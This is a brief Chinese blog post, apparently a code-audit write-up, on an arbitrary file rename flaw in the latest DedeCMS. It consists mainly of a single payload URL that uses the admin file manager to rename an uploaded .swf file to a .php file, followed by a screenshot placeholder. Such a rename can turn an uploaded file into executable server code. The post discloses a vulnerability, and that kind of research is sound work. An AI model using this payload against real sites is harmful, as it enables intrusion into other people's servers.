代码审计之织梦最新版任意文件名修改漏洞

一、payload如下:

1
http://localhost/dede/file_manage_control.php?fmdo=rename&oldfilename=/uploads/media/180330/1_2146195021.swf&newfilename=/mochazz.php

二、效果图:

29

阅读更多